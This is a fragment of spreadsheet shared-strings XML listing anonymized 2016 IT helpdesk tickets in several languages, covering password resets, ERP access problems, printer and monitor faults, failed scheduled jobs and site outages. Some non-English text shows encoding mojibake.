  <si>
    <t xml:space="preserve">job Job_2588 failed in job_scheduler at: 09/29/2016 01:30:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_2588 failed in job_scheduler at: 09/29/2016 01:30:00</t>
  </si>
  <si>
    <t>outlook funktioniert nicht</t>
  </si>
  <si>
    <t xml:space="preserve">am rechner evhw8114148 funktioniert outlook nicht mehr._x000D_
</t>
  </si>
  <si>
    <t>jnktafrs ytxiowbh</t>
  </si>
  <si>
    <t>lean tracker not opening</t>
  </si>
  <si>
    <t>gvsabjhq cgwsbiep</t>
  </si>
  <si>
    <t>po5616680457 same tax issue</t>
  </si>
  <si>
    <t>modify jb_ecc_bw_zsd531 to pull 36 month sales data from zsd532 table</t>
  </si>
  <si>
    <t xml:space="preserve"> we are in the process of refreshing history in rr and we need to send 3 years sales data from zsd532 table through bobj script jb_ecc_bw_zsd531. please modify the programdnty to pull 36 month data (-1 to -36) from zsd532, once the extract is complete we will switch it back to delta extraction.</t>
  </si>
  <si>
    <t>create guest wifi - vvrassyhrt</t>
  </si>
  <si>
    <t xml:space="preserve">i am unable to login to the attendance_tool --so reset my attendance_tool password </t>
  </si>
  <si>
    <t xml:space="preserve">reset my attendance_tool password </t>
  </si>
  <si>
    <t>boirqctx bkijgqry</t>
  </si>
  <si>
    <t xml:space="preserve"> hi,
pl. provide business_client authorization to uypsqcbm fqpybgri for checking/downloading drawings.
cc: irgsthy , pl. provide your employee id 
</t>
  </si>
  <si>
    <t>oavigqeu kjmvtfpc</t>
  </si>
  <si>
    <t>not able to login to skype</t>
  </si>
  <si>
    <t>sound card issue in dell latitude m4800 laptop</t>
  </si>
  <si>
    <t>vpn ä¸èƒ½ç™»å½•ã€‚</t>
  </si>
  <si>
    <t xml:space="preserve">[â€Ž2016/â€Ž9/â€Ž29 9:14] daisy huang: _x000D_
hi, vpn æŒ‰ç…§é‚®ä»¶é‡Œè®¾ç½®çš„æ”¹äº†ï¼Œæ€Žä¹ˆè¿˜æ˜¯ç™»ä¸ä¸ŠåŽ»_x000D_
your system failed for antivirus check. please ensure the following is true and try again or contact your administrator: your antivirus software is enabled. it is up to date (antivirus database no older than 30 days) you have recently scanned your system (not longer than 7 days ago) _x000D_
[â€Ž2016/â€Ž9/â€Ž29 9:15] obuwfnkm ufpwmybi: _x000D_
ä½ çš„æ€æ¯’è½¯ä»¶æœ‰é—®é¢˜_x000D_
ç—…æ¯’åº“æ²¡æœ‰æ›´æ–°_x000D_
</t>
  </si>
  <si>
    <t>lzaqjxgi lzfycegm</t>
  </si>
  <si>
    <t>interface: fastethernet0/16 Â· asheshopsw5 on company-na-usa-usa-2950-access-sw02 is down_x000D_
interface: gigabitethernet1/0/18 Â· asheshopsw2 on company-na-usa-usa-3850-core-sw01 is down</t>
  </si>
  <si>
    <t xml:space="preserve">prdord 226040587   226040835    226040589    226901663   can not relese </t>
  </si>
  <si>
    <t>115939476   226040835    226040589  user status cer1 is active._x000D_
 226901663    user status cer2 is active._x000D_
can not  create the production order _x000D_
please help to fix it .</t>
  </si>
  <si>
    <t>rqpfshjd qiulphdr</t>
  </si>
  <si>
    <t>can not transfer customer in tracking to crm</t>
  </si>
  <si>
    <t xml:space="preserve">from: crjhotyk pxslorbe _x000D_
sent: thursday, september 29, 2016 2:57 am_x000D_
to: rakthyesh ramdntythanjesh_x000D_
subject: crm crjhotyk pxslorbe_x000D_
_x000D_
can not transfer customer in tracking to crm- should be able to right click and click track to crm, does not work._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>hr_tool e-time problems</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: nwzhlktu.plktredg@gmail.com_x000D_
_x000D_
i am trying to enter etime on the hub but only get this screen:  it will not go anywhere from this screen.  can this be corrected?  please get in touch with me tomorrow during office hours._x000D_
_x000D_
[cid:image003.jpg@01SID_359b8.f6a48660]_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>kdjfhwua arfpnhbj</t>
  </si>
  <si>
    <t>engineering_tool urgent</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: uezonywf.rldbvipu@gmail.com
i have access to engineering_tools (engineering_tool) but my name doesn't show up in the drop down for salesman or uacyltoe hxgaycze performed by and it isn't allowing me to write it in. can i please be added aerp.
tommyth duyhurmont
channel partner sales engineer
company inc.
uezonywf.rldbvipu@gmail.com&lt;mailto:uezonywf.rldbvipu@gmail.com&gt;
www.company.com&lt;
www.company.com/engineering_tool/en/home.html
[
</t>
  </si>
  <si>
    <t>ioulqtmk dqevzrsg</t>
  </si>
  <si>
    <t>password was reset  but will not allow reset for SID_34 erp production</t>
  </si>
  <si>
    <t>collaboration_platform for business continues to sync all the time</t>
  </si>
  <si>
    <t>collaboration_platform is using a lot of memory on my computer, it is trying to sync a large number of file +30,000, i try to exit it. i try to end the process nothing works. i would like to uninstall it if possible. can this be fixed?
: contact #</t>
  </si>
  <si>
    <t>znwytghq sibchqoz</t>
  </si>
  <si>
    <t>frequent account lockout</t>
  </si>
  <si>
    <t xml:space="preserve">access to open this link </t>
  </si>
  <si>
    <t xml:space="preserve">access to open this link for corp contracts 
i don't have access to open this link for corp contracts 
can you please review and usa me access 
dthyan matheywtyuews
sales manager gl2
oetlgbfw.bsctrnwp@gmail.com
</t>
  </si>
  <si>
    <t xml:space="preserve">from: tsbnfixp numwqahj 
sent: wednesday, september 28, 2016 9:01 pm
to: nwfodmhc exurcwkm
subject: amar wg: die synchronisierung mit exchange activesync ist auf ihrem gerÃ¤t vorÃ¼bergehend blockiert, bis der zugriff vom administrator gewÃ¤hrt wird.
importance: high
please usa access for that company owned device.
user-id: grbhybrdg
tsbnfixp numwqahj
thanking you in anticipation!
oqlcdvwi pulcqkzo
von: microsoft outlook 
gesendet: mittwoch, 28. september 2016 17:29
an: tsbnfixp numwqahj &lt;tsbnfixp.numwqahj@gmail.com&gt;
betreff: die synchronisierung mit exchange activesync ist auf ihrem gerÃ¤t vorÃ¼bergehend blockiert, bis der zugriff vom administrator gewÃ¤hrt wird.
der zugriff von ihrem mobilen gerÃ¤t auf inhalte Ã¼ber exchange activesync ist vorrÃ¼bergehend blockiert, da es in quarantÃ¤ne gestellt ist. sie mÃ¼ssen keine aktion durchfÃ¼hren. der inhalt wird automatisch heruntergeladen, sobald der zugriff vom administrator gewÃ¤hrt wird.
please ignore the above paragraph. we cannot change it or delete it. 
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 
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 
currently approved handheld devices can be found in this policy: 
wireless mobility technical document 
the above policy will be updated as other devices are approved for use. 
if you own an approved device and would like to take advantage of this opportstorage_product you can submit a ticketing_tool ticket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 
any ticket without the signed form will be cancelled. you have 2 weeks to process and submit the form before your device will be denied (deleted from quarantine). 
wireless mobility standard procedure 
informationen zu ihrem mobilen gerÃ¤t:
gerÃ¤temodell: iphone6c2
gerÃ¤tetyp: iphone
gerÃ¤te-id: fvqfj874r56gj3r4jb39kdgu3s
gerÃ¤tebetriebssystem: ios 10.0.sartlgeo lhqksbdx4a403
gerÃ¤tebenutzer-agent: apple-iphone6c2/1401.403
gerÃ¤te-imei: 
exchange activesync-version: 16.0
gerÃ¤tezugriffsstatus: quarantined
grund fÃ¼r gerÃ¤tezugriffsstatus: global
um 28.09.2016 15:28:41 an tsbnfixp.numwqahj@gmail.com gesendet.
</t>
  </si>
  <si>
    <t>tsbnfixp numwqahj</t>
  </si>
  <si>
    <t>correct billing errors vfx3</t>
  </si>
  <si>
    <t>to correct attached listed errors</t>
  </si>
  <si>
    <t>i did a po and it received with no problem, i try to ship thru pweaver in erp and it tells me the server is unable to pr</t>
  </si>
  <si>
    <t>i did a po and it received with no problem, i try to ship thru pweaver in erp and it tells me the server is unable to process the request.</t>
  </si>
  <si>
    <t>vwaufgxr nvdyhlqk</t>
  </si>
  <si>
    <t>skype issues - calling desk and headset // ooo</t>
  </si>
  <si>
    <t xml:space="preserve">my skype errors out when calling my desk phone.  it calls other numbers in the building fine when i am in kqelgbis stiarhlu.  also, skype headset is connected and on but doesn't work.  have to switch to pc speakers to hear.  </t>
  </si>
  <si>
    <t>ifblxjmc dyrgfwbm</t>
  </si>
  <si>
    <t>iphone : crm app install on iphone.</t>
  </si>
  <si>
    <t>jcfignaz tyguzslr</t>
  </si>
  <si>
    <t>password resets to everything but erp productio</t>
  </si>
  <si>
    <t>my 2nd monitor will not display any video, it says no signal can be found.</t>
  </si>
  <si>
    <t>erp password reset needed</t>
  </si>
  <si>
    <t>wi- fi access to user jamhdtyes kinhytudel</t>
  </si>
  <si>
    <t>there is no connection to the erp system.  we have no erp, reporting_tool, engineering tool or anything that connects to erp</t>
  </si>
  <si>
    <t>no one at the usa facility can log onto erp.  we receive an error message "loggin balancing error".</t>
  </si>
  <si>
    <t xml:space="preserve">my contact information is as follows: 
</t>
  </si>
  <si>
    <t>erp connection</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: jxgobwrm.qkugdipo@gmail.com
i was unable to save my file in ug. keep getting error and save canceled.
rebooted and now i can't login to engineering tool
[cid:image001.png@01SID_35986.bcd4a410]
knethyen grechduy
engineer, product engineering
company
jxgobwrm.qkugdipo@gmail.com&lt;mailto:jxgobwrm.qkugdipo@gmail.com&gt;
[cid:image001.jpg@01ced94a.22bd1f30]
</t>
  </si>
  <si>
    <t>jxgobwrm qkugdipo</t>
  </si>
  <si>
    <t>help. all of our systems are down. erp is down. nx is down. reporting_tool cannot connect. seems to be all users at our site</t>
  </si>
  <si>
    <t>tqrlikex moxaebfq</t>
  </si>
  <si>
    <t>the termination action for manuel zuehlke has completed.</t>
  </si>
  <si>
    <t xml:space="preserve">hello , _x000D_
_x000D_
a kÃ¼ndigung for manuel zuehlke, 21111283, effective 02.09.2016 has been approved. _x000D_
</t>
  </si>
  <si>
    <t>clyauqjw cxwrsflt</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_2668 failed in job_scheduler at: 09/28/2016 13:06:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_2668 failed in job_scheduler at: 09/28/2016 13:06:00</t>
  </si>
  <si>
    <t>administration tools</t>
  </si>
  <si>
    <t>help to install the administration tools in windows 7 os</t>
  </si>
  <si>
    <t>unable to attach an attachment in expense report</t>
  </si>
  <si>
    <t>unable to login business_client</t>
  </si>
  <si>
    <t xml:space="preserve">unable to login business_client as there was no prompt to login to SID_34 account </t>
  </si>
  <si>
    <t>create quote is not working in distributor_tool</t>
  </si>
  <si>
    <t>warehouse to's are creating with planned pgi date base on confirmed date not customer committed.</t>
  </si>
  <si>
    <t>we are finding warehouse to's creating with the planned pgi date based on the production confirmed date and not the committed date to the customer.  this is occurring on orders with multiple schedule lines, usually created by production recommits.  a good example is sales order 35994153 line 5 with to number 263520.  i will be attaching a pdf copy</t>
  </si>
  <si>
    <t>hzpmalgo xpvugeyr</t>
  </si>
  <si>
    <t>msoffice 2016 installation</t>
  </si>
  <si>
    <t>your prjuysva.vpbudksy@gmail.com unauthorized loggin attempt</t>
  </si>
  <si>
    <t xml:space="preserve">from: naveuythen dyhtruutt 
sent: wednesday, september 28, 2016 4:56 pm
to: nwfodmhc exurcwkm
subject: dan fw: your prjuysva.vpbudksy@gmail.com unauthorized loggin attempt
hi
i am getting this mail continuously from past 15 days .... can you pls have a look into this. 
</t>
  </si>
  <si>
    <t>prjuysva vpbudksy</t>
  </si>
  <si>
    <t>security clearance to view cutter and insert drawings on our web based netweaver system.</t>
  </si>
  <si>
    <t xml:space="preserve">security clearance to view cutter and insert drawings on our web based netweaver system._x000D_
_x000D_
hello it team,_x000D_
_x000D_
please help my team members get the proper security clearance to view cutter and insert drawings on our web based netweaver system.  </t>
  </si>
  <si>
    <t>i do not get open  gkad from nx9. apper</t>
  </si>
  <si>
    <t>appears the next message: "nx 9 has stoped working" a problem caused the programdnty..._x000D_
gkad lathe &amp; gkad4x function properly</t>
  </si>
  <si>
    <t>otjhnpvk vptsreal</t>
  </si>
  <si>
    <t>all the users from usa plant are unable to access mii</t>
  </si>
  <si>
    <t>all the users from usa plant are unable to access mii. they're getting an error which states that recovering webpage. the entire plant is affected.</t>
  </si>
  <si>
    <t xml:space="preserve">unable to clock orders in mii. </t>
  </si>
  <si>
    <t xml:space="preserve">unable to clock orders in mii. multiple user's affected.
phone: </t>
  </si>
  <si>
    <t>hcdwkxzo quykrcom</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_37hotf failed in job_scheduler at: 09/28/2016 10:57:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_37hotf failed in job_scheduler at: 09/28/2016 10:57:00</t>
  </si>
  <si>
    <t>can you help resetting the hr_tool time clock password?</t>
  </si>
  <si>
    <t>the clock that you punch in your employee number, it has a maintenance mode and we forgot the password. this is done on the device and not on the pc.</t>
  </si>
  <si>
    <t xml:space="preserve">missing travel privileges </t>
  </si>
  <si>
    <t xml:space="preserve">
received from: uyrpdvoq.mbzevtcx@gmail.com
hi
i have now two open travel expenses which i canÂ´t enter into erp
can you you please solve it aerp
[cid:image001.png@01SID_359a8.4942a430]
uyrpdvoq mbzevtcx
sales manager earthworks european served area â€“ north
uyrpdvoq.mbzevtcx@gmail.com&lt;mailto:uyrpdvoq.mbzevtcx@gmail.com&gt;
company infrastructure gmbh
geschÃ¤ftsfÃ¼hrer: phvkowml azbtkqwx und naruedlk mpvhakdq
www.company.com&lt;
</t>
  </si>
  <si>
    <t>unlock user "erp-mae" on server HostName_1076</t>
  </si>
  <si>
    <t>please help unlock the user " erp-mae" on server HostName_1076 at the  earliest.</t>
  </si>
  <si>
    <t>lost main monitor display</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: wlsazrce.uwehsqbk@gmail.com_x000D_
_x000D_
hi,_x000D_
_x000D_
my main monitor will not turn on.  the computer has been shut down and restarted and all cable connections have been checked.  can someone take a look at it?  i can continue working off of the secondary monitor, it is just an inconvenience._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>engineering tool client - unable to launch</t>
  </si>
  <si>
    <t xml:space="preserve">stopped responding error_x000D_
multiple programdnty shortcuts exist on his desktop for engineering_tool, and none of them work._x000D_
password has expired as well as the aiqjxhuv dceghpwn runtime software is missing from the pc_x000D_
</t>
  </si>
  <si>
    <t>fydosbih lafdsumb</t>
  </si>
  <si>
    <t>unable to sign in to outlook 2010 after password change</t>
  </si>
  <si>
    <t>ticketing_tool ticket</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: wkqjcfgy.vsknlfri@gmail.com
i need to get crm loaded on my outlook.
i'm currently using the web crm version.
wkqjcfgy vsknlfri
metalworking sales engineer
company inc.
wkqjcfgy.vsknlfri@gmail.com
technical support:
</t>
  </si>
  <si>
    <t>wkqjcfgy vsknlfri</t>
  </si>
  <si>
    <t>websites not loading on company center</t>
  </si>
  <si>
    <t>companycenter.company.com</t>
  </si>
  <si>
    <t xml:space="preserve">acct 81910520 was set up to get one monthly inwarehouse_tool but they are getting multiple inwarehouse_tools. </t>
  </si>
  <si>
    <t xml:space="preserve">
SID_34 - account 81910520 - smhdyhti tool was set up as zm combined monthly billing.  for july &amp; august they received multiple inwarehouse_tools.  see attached. </t>
  </si>
  <si>
    <t>jrzpcesm oznigwvj</t>
  </si>
  <si>
    <t>open order book problem (( back order )) - access</t>
  </si>
  <si>
    <t>we are having a problem back order report paramdntyeter in access. _x000D_
((open order book))</t>
  </si>
  <si>
    <t>jevckify sbnohwiv</t>
  </si>
  <si>
    <t>name:mfeyouli ndobtzpw_x000D_
language:_x000D_
browser:microsoft internet explorer_x000D_
email:mfeyouli.ndobtzpw@gmail.com_x000D_
customer number:_x000D_
telephone:5245861556_x000D_
summary:can you unlock haunm erp SID_34 account, he seems to get locked out everytime he tries to log in</t>
  </si>
  <si>
    <t>erp SID_34 password locked</t>
  </si>
  <si>
    <t>update on ticket_no0443915</t>
  </si>
  <si>
    <t>printer asking to update driver</t>
  </si>
  <si>
    <t>erp SID_9 password reset</t>
  </si>
  <si>
    <t>ybplwrez lqcyehbf</t>
  </si>
  <si>
    <t>ticket update on ticket_no0443915</t>
  </si>
  <si>
    <t>etime visibility on hr_tool</t>
  </si>
  <si>
    <t>hi all.  had this issue a month ago and was told to delete my browsing history.  i did and access was restored.  i routinely clear my browsing history but today cannot view etime.  see attached screen shot.</t>
  </si>
  <si>
    <t>unable to send skype meeting invitation.</t>
  </si>
  <si>
    <t>ughzilfm cfibdamq called requesting for the appreciate hub link</t>
  </si>
  <si>
    <t>probleme mit ie \niptbwdq csenjruz</t>
  </si>
  <si>
    <t xml:space="preserve"> wanted to know if the account of pathuick  stope is still active.</t>
  </si>
  <si>
    <t xml:space="preserve">can no longer print to tc 47. </t>
  </si>
  <si>
    <t>i am no longer able to print to tc47. i must install a driver for this and i am not sure how. i used to be able to print to tc47 without an issue, and for some reason i am no longer able to.</t>
  </si>
  <si>
    <t>analysis add in does not show up.</t>
  </si>
  <si>
    <t>s1 to k1 for hcuixqgj mavxgqbs</t>
  </si>
  <si>
    <t>install we03 \ewew8323601 \acqpinyd ecygimqd</t>
  </si>
  <si>
    <t>probleme mit portal \acqpinyd ecygimqd</t>
  </si>
  <si>
    <t>hcuixqgj.mavxgqbs@gmail.com password reset</t>
  </si>
  <si>
    <t>probleme mit portal .\hcuixqgj mavxgqbs</t>
  </si>
  <si>
    <t>hcuixqgj mavxgqbs</t>
  </si>
  <si>
    <t>hr_tool etime not loading</t>
  </si>
  <si>
    <t>psikzmba stumdcqp</t>
  </si>
  <si>
    <t>please delete the attached series of meetings</t>
  </si>
  <si>
    <t xml:space="preserve">meeting was scheduled by a former employee_x000D_
_x000D_
organizer: panjkytr mehrota_x000D_
_x000D_
subject: fw: nextgen kentip mfg._x000D_
_x000D_
details:_x000D_
_x000D_
from: panjkytr mehrotra _x000D_
sent: wednesday, march 09, 2016 11:30 am_x000D_
to: panjkytr mehrotra; ohljvzpn phwdxqev; fabijhsd ocsnugeh; ksvlowjd ptyzxscl; nwgcbfdt ahmbnsoi; aditya choragudi; gotbumak ymdqokfp; cyxieuwk rekwlqmu; ruy frota; estaxpnz mqhrvjkd; vipqmdse zkaowfrx; jhwgydeb ufiatosg; ynlqrebs hwfoqjdu; doug harman; ejvkzobl yijgokrn; frmyejbx weclfnhx; cltszugw tgzbklec; gdxujefz egnwtvch; raouf benamor; lpnzjimdghtyy mwtvondq; lwguyibh nqepkugo; knqmscrw sdtoezjb; arjpdohf mrqwdtil_x000D_
subject: nextgen kentip mfg._x000D_
when: occurs every wednesday effective 3/16/2016 until 12/14/2016 from 9:00 am to 10:00 am (utc-05:00) eastern time (us &amp; canada)._x000D_
where: _mccoy_18_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1129conf_s failed in job_scheduler at: 09/28/2016 08:40:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1129conf_s failed in job_scheduler at: 09/28/2016 08:40:00</t>
  </si>
  <si>
    <t>whenever pc is turned on it shows a bluescreen. but then works.</t>
  </si>
  <si>
    <t>whenever pc is turned on it shows a blue screen. but then works._x000D_
keith suspects the cache is causing it.</t>
  </si>
  <si>
    <t>fmorwhip jidvlbtp</t>
  </si>
  <si>
    <t xml:space="preserve">unable to find network drives after password reset </t>
  </si>
  <si>
    <t>dxtulsik xizungmt</t>
  </si>
  <si>
    <t>vip 2 // issue with monitor display</t>
  </si>
  <si>
    <t>name : stdezpqw bkmeuhfz_x000D_
email : stdezpqw.bkmeuhfz@gmail.com_x000D_
telephone : 724-539-5191_x000D_
summary : my 2nd monitor is no longer operating as the 2nd display.  my office was re-arranged yesterday &amp; when i moved the monitor to the right location it stopped displaying the content &amp; only shows a dell window with "self uacyltoe hxgaycze feature check" &amp; red, gtehdnyu, blue &amp; white bars beneath that message.  couldn't activate through control panel</t>
  </si>
  <si>
    <t>configair server in SID_1 uacyltoe hxgaycze environment not working properly - please restart the server</t>
  </si>
  <si>
    <t>mill_model model in SID_1 is not working correctly while starting the configuration proces from scratch. it does not run through the procedures we created to default characteristic values based on selected product platform._x000D_
please restart the server as i have an important training session to amerirtcas cas team at 3pm cest (my time today) - which is 40 min from now.</t>
  </si>
  <si>
    <t>password issue.</t>
  </si>
  <si>
    <t xml:space="preserve">hi,_x000D_
_x000D_
mr. indra kurtyar a is not able to log in due to password issue. _x000D_
_x000D_
kindly provide new password to the person._x000D_
_x000D_
name: mr. indra kurtyar a_x000D_
i. no 202961_x000D_
user id : vvrajai_x000D_
email : indrakurtyar .rajanna@company.com_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>lpdrjngh brdquyct</t>
  </si>
  <si>
    <t>lese und schreibberechtigung fÃ¼r HostName_753\produktion</t>
  </si>
  <si>
    <t>modify quote performance model</t>
  </si>
  <si>
    <t>the model and field [pk_publish_pk_otc_quotes_zcae_quote_performance_s].[value_raw_doc_curr_qt] sees to be rounding.  see attached screenshot - converted to usd for that sample quote is 211.30, but the value in lc is 211.00.... but the currency for the document is in usd so these two fields should match.</t>
  </si>
  <si>
    <t>unable to connect to company secure</t>
  </si>
  <si>
    <t>please upgrade tom and karghyuens office to the newest</t>
  </si>
  <si>
    <t>please upgrade tom and karghyuen's office to the newest</t>
  </si>
  <si>
    <t>zarlgjes nxjvzcta</t>
  </si>
  <si>
    <t xml:space="preserve">please reset my password, not sure why mine giving problems?_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>gvderpbx udrzjxkm</t>
  </si>
  <si>
    <t>laptop is getting a power supply not sufficient warning on boot up when docked.</t>
  </si>
  <si>
    <t xml:space="preserve">zlz agreements  4111244546 +  4111337261 donÂ´t create a planning demand </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: qbewrpfu.lwibmxzo@gmail.com_x000D_
_x000D_
hello help,_x000D_
_x000D_
_x000D_
_x000D_
the zlz agreement 4111244546 is shown in md04 as demand, but the is no po for the production plant._x000D_
_x000D_
the zlz agreement 4111337261 is not shown as demand in md04._x000D_
_x000D_
maybe it is a problem with the material type?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
mit freundlichen grÃ¼ÃŸen / best </t>
  </si>
  <si>
    <t>ughzilfm cfibdamq called in to reset password for zlnfpuam aktplhre</t>
  </si>
  <si>
    <t>drucker vh77 und vh79 funktionieren nicht. ticket bitte an edv germany hr. wurdack/ steinich</t>
  </si>
  <si>
    <t>_x000D_
   â€¢  printer name / make - model?  (ex hq50 â€“ wy98 - hp 8150) _x000D_
 hp laser jet_x000D_
   â€¢  detailed description of the problem ?_x000D_
druckauftrag wir nicht ausgefÃ¼hrt_x000D_
_x000D_
   â€¢  type of documents not printing?  (email â€“ excel â€“ wordâ€¦etc) _x000D_
    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</si>
  <si>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tcepzdhi ymbirlod</t>
  </si>
  <si>
    <t>nvszqucy rhtwlzkj</t>
  </si>
  <si>
    <t>user- moblews forgotten his telephony_software password</t>
  </si>
  <si>
    <t xml:space="preserve">user- moblews forgotten his telephony_software password_x000D_
schtrtgoyht mobley_x000D_
</t>
  </si>
  <si>
    <t>pc eemw8144241 einrichten damit der barcode angezeigt und man ihm drucken kann</t>
  </si>
  <si>
    <t>pc eemw8144241 einrichten damit der barcode angezeigt und man ihm drucken kann_x000D_
ebs bÃ¼ro a. dicker</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: aksthyuhath.shettythruy@company.com_x000D_
_x000D_
hi,_x000D_
_x000D_
please reset the password of mr. aqihfoly xsrkthvf._x000D_
_x000D_
emp no_x000D_
_x000D_
name_x000D_
_x000D_
useid_x000D_
_x000D_
manager_x000D_
_x000D_
200709_x000D_
_x000D_
aqihfoly xsrkthvf_x000D_
_x000D_
hsh_x000D_
_x000D_
panghyiraj shthuihog_x000D_
_x000D_
_x000D_
fyi._x000D_
[cid:image001.png@01SID_359a4.8f856260]_x000D_
_x000D_
_x000D_
with </t>
  </si>
  <si>
    <t>ordnerfreigabe fÃ¼r m: kvp3 und ce_leiter</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_593 failed in job_scheduler at: 09/28/2016 06:35:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_593 failed in job_scheduler at: 09/28/2016 06:35:00</t>
  </si>
  <si>
    <t>wifi is not working.</t>
  </si>
  <si>
    <t>please give me administration permission for my user id:reddakv</t>
  </si>
  <si>
    <t>please give me administration permission for my user id:reddakv_x000D_
we need to install our team basic applications and software`s.</t>
  </si>
  <si>
    <t>org 1314 - inwarehouse_tool 0159108935 issue</t>
  </si>
  <si>
    <t xml:space="preserve">the inwarehouse_tool printed output is not complete ie. item no, quantity, unit price and total amount are dierppear.  _x000D_
attached delviery note and inwarehouse_tool are for your information._x000D_
please help fix this issue and advise back to us aerp., </t>
  </si>
  <si>
    <t>org 1314 : inwarehouse_tool# 0159108934  issue</t>
  </si>
  <si>
    <t xml:space="preserve">refer to this inwarehouse_tool no. 0159108934 , the printed inwarehouse_tool is not complete ie. the line item no 60 , quanttiy, unit price and tootal amount are dierppear. also, the total inwarehouse_tool amount is not correct.   the attached are related delivery note and inwarehouse_tool as for your information.  please help fix this issue and inform us aerp., </t>
  </si>
  <si>
    <t>please restart the SID_56 server today 8pm est</t>
  </si>
  <si>
    <t>hello team,_x000D_
_x000D_
java changes are moved to production but unfortunately db changes were not moved, so we request you please restart the SID_56 server to reflected dba changes in production.</t>
  </si>
  <si>
    <t>nvxkdqfi slkojtcg</t>
  </si>
  <si>
    <t>incorrect logo is been displayed on distributor_tool</t>
  </si>
  <si>
    <t>incorrect logo is been displayed on distributor_tool._x000D_
logo changes was requested with the ticket ticket_no1475338. logo changes were done and moved to qa.since there was one  file which was dependent with other ticket and logo changes file were moved along with other ticket where requestor does not want the logo changes now.</t>
  </si>
  <si>
    <t>viewer for step files</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: azyfsrqh.wkavqigu@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
i need an viewer at my computer to check step files._x000D_
_x000D_
mit freundlichen grÃ¼ssen,_x000D_
with best </t>
  </si>
  <si>
    <t>azyfsrqh wkavqigu</t>
  </si>
  <si>
    <t>setup new ws \zlnfpuam aktplhre</t>
  </si>
  <si>
    <t>zlnfpuam aktplhre</t>
  </si>
  <si>
    <t>erp purchasing  access issue  user kgueyiwp cjlonvme (helmu)</t>
  </si>
  <si>
    <t xml:space="preserve">system (SID_34, SID_37, SID_39, SID_38, hrp, other ?):  purchasing portal (mycompany.company.com/irj/portal)_x000D_
_x000D_
enter user id of user having the issue: helmu  _x000D_
_x000D_
_x000D_
describe the issue: action could not be performed!  the attribudes of the user are inconsistent or not defined. see transaction ppoma_ppb._x000D_
(attached screen shot)_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>ekvtdcyq grncjlho</t>
  </si>
  <si>
    <t>power outage : vogelfontein sa site hard down since 04:53 am et on 09/28.</t>
  </si>
  <si>
    <t>what type of outage:  ___x__network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ___no______     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   _______04:53 am et on 09/28._______________x000D_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</si>
  <si>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drucker em06 im auslieferbereich. immer den gleichen lieferschein 10 mal. danach wird erst der richtige ausgedruckt. </t>
  </si>
  <si>
    <t>drucker em06 im auslieferbereich. immer den gleichen lieferschein 10 mal. danach wird erst der richtige ausgedruckt. erp problem</t>
  </si>
  <si>
    <t>egklxsoy hivwzjcf</t>
  </si>
  <si>
    <t>fqhlvcxn zdfymgjp wants to share the file fqhlvcxn zdfymgjp.pdf with you</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: fqhlvcxn.zdfymgjp@gmail.com_x000D_
_x000D_
to view fqhlvcxn zdfymgjp.pdf, sign in&lt;_x000D_
_x000D_
_x000D_
???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????_x000D_
[#+company/posts&gt;  [_x000D_
select the following link to view the disclaimer in an alternate language. </t>
  </si>
  <si>
    <t>pls check erp SID_34 account of vvgraec - she is not able to sign on anymore</t>
  </si>
  <si>
    <t xml:space="preserve">pls check erp account of vvgraec - she is not able to sign on anymore, pls see attachment._x000D_
</t>
  </si>
  <si>
    <t>???????????????????</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: yzbjhmpw.vzrulkog@gmail.com_x000D_
_x000D_
[cid:image001.png@01SID_35974.fdbf2930]_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
mit freundlichem gruÃŸ_x000D_
_x000D_
ulrike aÃŸmann_x000D_
custom solutions engineering europe  drilling&amp;countersinking_x000D_
yzbjhmpw.vzrulkog@gmail.com&lt;mailto:yzbjhmpw.vzrulkog@gmail.com&gt;_x000D_
t:+49-911-0846609_x000D_
f:+49-911-0846631_x000D_
_x000D_
company shared services gmbh, wehlauer strasse 73, d-90766 fÃ¼rth, www.company.com&lt;_x000D_
_x000D_
company shared services gmbh_x000D_
geschÃ¤ftsfÃ¼hrer: phvkowml azbtkqwx, naruedlk mpvhakdq_x000D_
sitz der gesellschaft: fÃ¼rth/bay. - registergerirtcht: fÃ¼rth/bay. hrb 10171_x000D_
_x000D_
_x000D_
_x000D_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
[#+company/posts&gt;  [_x000D_
select the following link to view the disclaimer in an alternate language. </t>
  </si>
  <si>
    <t>yzbjhmpw vzrulkog</t>
  </si>
  <si>
    <t>url portal not functioning</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: cxltnjuk.hkdefraw@gmail.com_x000D_
_x000D_
dear sir,_x000D_
_x000D_
